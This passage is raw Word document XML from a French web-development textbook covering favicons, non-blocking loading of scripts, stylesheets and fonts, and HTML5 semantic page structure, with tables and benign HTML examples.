        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'image doit mesurer au moins 1200 × 630 pixels et rester lisible en vignette. Testez le résultat avec les validateurs de chaque plateforme avant de publier une page importante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>3.4.5 La favicon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La favicon apparaît dans l'onglet, les favoris et l'écran d'accueil mobile. Un fichier SVG s'adapte à toutes les tailles ; un PNG de 32 pixels sert de repli. Déclarez-les explicitement pour éviter une requête automatique vers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/favicon.ico</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois déclarations pour couvrir navigateurs et mobiles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&lt;link rel="icon" href="favicon.svg" type="image/svg+xml"&gt;</w:t>
        <w:br/>
        <w:t>&lt;link rel="alternate icon" href="favicon.png" sizes="32x32"&gt;</w:t>
        <w:br/>
        <w:t>&lt;link rel="apple-touch-icon" href="apple-touch-icon.png"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.5 Charger les ressources sans bloquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le navigateur construit le document en le parcourant. Une feuille de style rencontrée bloque le rendu : il doit connaître les styles avant de peindre, sinon l'utilisateur verrait un flash de contenu non stylé (FOUC). Un script classique bloque l'analyse du document : il peut modifier la page, il faut donc l'exécuter dans l'ordre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2730500"/>
            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f06.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.6 — Deux façons de charger un script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.8 — Quatre modes de chargement des scripts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8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Forme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Quand le script s'exécute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;script src&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Immédiatement, bloque l'analyse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rare, scripts critiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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&lt;script defer src&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Après l'analyse, dans l'ordre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Scripts d'interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;script async src&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dès qu'il est téléchargé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compteurs, publicités</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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&lt;script type=module&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Différé par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Code moderne, imports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour les feuilles de style non critiques (polices, thèmes alternatifs), l'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>media</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou le chargement asynchrone évitent de retarder le premier rendu. Pour les polices, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-display: swap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> affiche immédiatement une police de substitution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Ordonner les ressources : critique d'abord, le reste ensuite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&lt;link rel="stylesheet" href="css/style.css"&gt;</w:t>
        <w:br/>
        <w:t>&lt;link rel="preload" href="fonts/inter-var.woff2" as="font"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      type="font/woff2" crossorigin&gt;</w:t>
        <w:br/>
        <w:t>&lt;link rel="stylesheet" href="css/print.css" media="print"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.6 Structurer le corps du document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contient le contenu visible. Depuis HTML5, des éléments sémantiques décrivent les grandes régions de la page. Ils n'apportent aucun style par défaut : leur intérêt est de fournir des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>repères</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aux lecteurs d'écran, aux moteurs de recherche et aux développeurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.9 — Sept éléments pour décrire une page sans une seule classe CSS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180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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="458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Région décrite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Nombre par page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4589"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>En-tête de page ou de section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un par contexte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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nav</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="458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Ensemble de liens de navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Un à trois</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4589"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenu principal, unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un seul</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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article</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="458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Contenu autonome, réutilisable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Autant que nécessaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4589"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Section thématique, toujours titrée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Autant que nécessaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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aside</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="458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Contenu connexe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Zéro à deux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>footer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4589"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pied de page ou de section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un par contexte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une page complète, structurée sans une seule div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&lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;a class="skip-link" href="#contenu"&gt;Aller au contenu&lt;/a&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;header&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;nav aria-label="Navigation principale"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;li&gt;&lt;a href="/"&gt;Accueil&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;li&gt;&lt;a href="/cours"&gt;Cours&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;/ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/nav&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/header&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;main id="contenu"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;h1&gt;Un titre unique&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;article&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;h2&gt;Un titre de section&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;p&gt;Un paragraphe.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/article&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/main&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;footer&gt;&lt;p&gt;© 2026&lt;/p&gt;&lt;/footer&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
